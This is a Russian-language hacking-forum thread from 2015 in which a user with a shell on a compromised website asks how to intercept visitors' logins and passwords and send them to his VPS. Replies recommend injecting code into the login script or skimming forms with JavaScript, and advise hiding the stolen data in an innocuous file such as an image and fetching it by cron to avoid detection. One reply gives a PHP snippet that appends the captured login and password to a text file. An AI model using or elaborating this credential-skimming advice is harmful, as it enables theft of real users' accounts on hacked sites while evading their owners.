HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу установка сниффера
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.03.2015, 13:19
reuvenmatbil
Новичок
Регистрация: 01.09.2012
Сообщений: 28
Провел на форуме:
5818

Репутация: 0
По умолчанию
имею шелл на сайте.

необходимо перехватывать логин и пароли юзеров чтоб они шли на впс

в какую сторону начинать копать чтобы реализовать задумку?
 
Ответить с цитированием

  #2  
Старый 09.04.2015, 01:17
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
По умолчанию
инжект в скрипт авторизации, если есть соответствующие права на файл...
 
Ответить с цитированием

  #3  
Старый 10.05.2015, 05:12
qweqwe
Новичок
Регистрация: 18.12.2007
Сообщений: 0
Провел на форуме:
63214

Репутация: 0
По умолчанию
так же интересует данный вопрос. Может кто то пример показать. Имеется шелл, идет ввод гифт кода, напишите примерный код, для того, чтобы введеные данные уходили ко мне на ВПС.

Так же прошу помощи по php, какие функции поизучать, чтобы ствить подобого рода снифера?

(чтобы ореентироватся в коде, какие параметры смотреть, как смотреть, что передается какой командой и тд. ) Спс заранее за помощь и ответы
 
Ответить с цитированием

  #4  
Старый 10.05.2015, 15:04
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185

Репутация: 694


По умолчанию
можно использовать два метода. первый - это просто грабим данные из форм посредством javaScript и ajax

второй - грабим переменные из php и их уже коипруем\отправляем на сервак.

кстати я бы не стал слать данные на свой серв, т.к. при обнаружении сниффера ваш серв спалят сразу же.

лучше данные писать в неприметный файл, например картинку и потом с сервера по крону скачивать эту картинку.
 
Ответить с цитированием

  #5  
Старый 10.05.2015, 19:04
Black Diver
Новичок
Регистрация: 20.03.2009
Сообщений: 28
Провел на форуме:
24366

Репутация: 0
По умолчанию
Например можно писать все переменные логина в файл и расположить его в удобном неприметном месте для скачивания.

Для этого в скрипт авторизации (после получения переменных с логином/паролем) вставляем код в стиле (код писался на коленке):

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'counter.txt'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login_var[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pass_var[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
где counter.txt это имя файла, $login_var и $pass_var - переменные из оригинального скрипта с логином и паролем а \n - перевод строки
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.